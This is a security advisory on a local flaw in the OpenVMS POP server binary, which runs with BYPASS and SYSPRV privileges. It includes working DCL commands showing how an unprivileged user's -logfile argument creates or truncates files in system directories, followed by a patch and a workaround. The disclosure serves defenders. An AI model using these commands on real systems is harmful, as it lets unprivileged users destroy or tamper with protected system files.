COMMAND OpenVMS POP server permits local file to be overwritten SYSTEMS AFFECTED TCPIP$POP_SERVER.EXE V5.3-18B PROBLEM Mike Riley [mike@akita.co.uk] of Akita [http://www.akita-security.co.uk] says : --snipp-- The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is installed with the VMS privileges BYPASS and SYSPRV: INSTALL> list ucx$pop_server.exe /full DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE UCX$POP_SERVER;1 Prv Entry access count = 1 Privileges = SYSPRV BYPASS INSTALL> The BYPASS privilege allows the pop server to override filesystem permissions. By use of the -logfile commandline switch, it is possible to persuade the server to open a file anywhere, or to truncate an existing file, as follows: $ show process/privs 25-SEP-2002 10:47:35.02 User: MIKE Process ID: 0000013F Node: VAX Process name: "_TNA21:_1" Authorized privileges: NETMBX TMPMBX Process privileges: NETMBX may create network device TMPMBX may create temporary mailbox Process rights: INTERACTIVE REMOTE System rights: SYS$NODE_VAX $ $ break_it :== $sys$system:ucx$pop_server.exe $ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE 19102-09-24 17:41:39 sizeof(block_wait_times) 160 19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32 19102-09-24 17:41:40 num_elems 5 [SNIP] ^C $ dir/prot sys$system:I_* Directory SYS$SYSROOT:[SYSEXE] I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 insufficient privilege or object protection violation Total of 1 file. $ ____________________________________________________________________ The file created looks like this: ____________________________________________________________________ Directory SYS$SYSROOT:[SYSEXE] I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 File ID: (9499,485,0) Size: 0/0 Owner: [SYSTEM] Created: 24-SEP-2002 17:41:41.14 Revised: 24-SEP-2002 17:41:57.09 (1) Expires: <None specified> Backup: <No backup recorded> Effective: <None specified> Recording: <None specified> File organization: Sequential Shelved state: Online File attributes: Allocation: 0, Extend: 0, Global buffer count: 0 No version limit Record format: Stream_LF, maximum 0 bytes, longest 32767 bytes Record attributes: Carriage return carriage control RMS attributes: None Journaling enabled: None File protection: System:RWED, Owner:RWED, Group:RE, World: Access Cntrl List: None Total of 1 file, 0/0 blocks. $ --snipp-- SOLUTION Patch ===== Compaq have released an ECO which corrects the problem: ECO B 1-JUL-2002 Alpha and VAX Workaround ========== Remove world execute permissions for the pop server binary.